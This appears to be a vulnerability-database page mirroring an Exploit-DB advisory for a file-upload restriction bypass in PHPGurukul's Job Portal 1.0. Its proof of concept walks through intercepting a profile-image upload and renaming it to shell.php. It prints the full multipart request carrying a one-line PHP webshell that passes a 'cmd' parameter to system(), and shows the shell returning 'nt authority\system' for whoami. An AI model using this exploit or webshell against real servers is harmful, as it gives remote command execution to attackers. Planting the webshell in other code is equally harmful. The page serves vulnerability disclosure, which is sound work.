Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Job Portal 1.0 - File Upload Restriction Bypass

🗓️ 13 May 2023 00:00:00Reported by Rafael PedreroType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 416 Views

Job Portal 1.0 File Upload Restriction Bypass allows authenticated users to upload webshell via profile imag

Code
<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link:
https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps


1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal
1.0. This allows for an authenticated user to potentially obtain RCE via
webshell.


2. Proof of Concept

1. Go the user profile >> (/jobportal/applicant/)
2.- Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
   Update 'filename' to desired extension. ex: shell.php
   Not neccesary change content type to 'image/png'

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--

====================================================================================================

6. Send the request and visit your new webshell
   Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
       nt authority\system

3. Solution:

Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

-->

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 May 2023 00:00Current
7.4High risk
Vulners AI Score7.4
file upload restriction bypassauthenticated userrcewebshellpatchowasp vulnerabilities
416